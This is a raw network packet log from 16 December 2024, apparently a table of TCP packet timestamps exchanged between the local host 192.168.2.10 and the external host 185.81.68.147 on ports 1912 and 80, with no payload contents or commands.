                                                                                                                                                                                                                                Dec 16, 2024 10:43:03.246601105 CET497291912192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:03.269301891 CET497291912192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:03.389245033 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:03.703603983 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:03.706057072 CET497291912192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:03.713717937 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:03.713766098 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:03.713902950 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:03.713937044 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:03.713998079 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:03.714010000 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:03.714044094 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:03.714140892 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:03.714173079 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:03.714175940 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:03.714184999 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:03.714198112 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:03.714211941 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:03.714236021 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:03.714260101 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:03.825846910 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:03.833950043 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:03.833970070 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:03.834059954 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:03.838021040 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:03.838037014 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:03.838799000 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:03.906281948 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:03.906385899 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:03.906497002 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:03.910453081 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:03.910581112 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:03.910650015 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:03.918927908 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:03.919013023 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:03.919068098 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:03.927284002 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:03.927361012 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:03.927474022 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:03.935940981 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:03.935962915 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:03.936033964 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:03.944058895 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:03.944173098 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:03.944217920 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:03.952454090 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:03.952532053 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:03.952579975 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:03.960968971 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:03.961096048 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:03.961168051 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:03.969202995 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:03.969286919 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:03.969583035 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:03.977629900 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:03.977736950 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:03.977791071 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:03.985296011 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:03.985364914 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:03.985419989 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:03.992434025 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:03.992624044 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:03.992748022 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.098695993 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.098743916 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.098831892 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.100919962 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.101035118 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.101097107 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.105751991 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.105803967 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.105870008 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.110212088 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.110332012 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.110413074 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.114937067 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.115083933 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.115158081 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.119678974 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.119718075 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.119786978 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.124326944 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.124474049 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.124522924 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.128912926 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.128998041 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.129064083 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.133301020 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.133424997 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.133466005 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.137830019 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.137923956 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.137976885 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.140376091 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.142260075 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.142363071 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.142422915 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.144846916 CET497291912192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.146775007 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.146892071 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.147036076 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.151415110 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.151436090 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.151489973 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.155778885 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.155913115 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.156421900 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.160310984 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.160393953 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.160454035 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.164823055 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.164935112 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.164982080 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.169461966 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.169570923 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.169629097 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.173795938 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.173908949 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.174017906 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.178495884 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.179287910 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.179339886 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.184026003 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.184232950 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.185252905 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.187463999 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.187500000 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.187833071 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.194154024 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.194188118 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.194245100 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.197694063 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.246556997 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.266000032 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.291385889 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.291419983 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.291526079 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.293116093 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.293304920 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.293381929 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.296824932 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.296861887 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.297163010 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.300573111 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.300609112 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.300797939 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.304050922 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.304265022 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.304335117 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.306385040 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.306437969 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.306545973 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.309850931 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.309952021 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.310013056 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.313275099 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.313448906 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.313527107 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.316677094 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.316749096 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.317051888 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.319876909 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.319964886 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.320072889 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.323117018 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.323281050 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.323801994 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.326406002 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.326507092 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.326756001 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.331989050 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.332889080 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.333000898 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.333605051 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.333640099 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.334157944 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.337207079 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.337241888 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.338252068 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.340466976 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.340481043 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.340531111 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.343528032 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.343689919 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.344815016 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.346890926 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.346910954 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.346976042 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.350097895 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.350219965 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.350310087 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.353404045 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.353537083 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.353995085 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.356312990 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.356482029 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.356547117 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.359729052 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.359747887 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.359821081 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.362752914 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.362901926 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.366049051 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.366133928 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.366204977 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.366250992 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.369137049 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.369153023 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.369220018 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.373054028 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.373214006 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.373311996 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.375799894 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.375817060 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.375869036 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.378879070 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.379015923 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.379086018 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.382153988 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.382170916 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.382231951 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.385382891 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.385551929 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.385618925 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.388355970 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.388530970 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.388593912 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.391575098 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.391741037 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.392605066 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.395040035 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.395227909 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.395302057 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.398230076 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.398242950 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.398410082 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.401356936 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.401501894 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.401581049 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.404443979 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.404594898 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.404649973 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.406356096 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.449677944 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.484318972 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.484461069 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.484589100 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.485688925 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.485707998 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.485768080 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.487231016 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.487246990 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.487324953 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.491437912 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.491576910 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.491683960 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.493427992 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.493544102 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.495775938 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.495857000 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.495935917 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.495986938 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.498213053 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.498379946 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.498451948 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.500652075 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.500797987 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.500861883 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.503160954 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.503326893 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.503391027 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.505400896 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.505567074 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.507838011 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.507915974 CET4975280192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.508029938 CET8049752185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:43:04.508064032 CET4975280192.168.2.10185.81.68.147
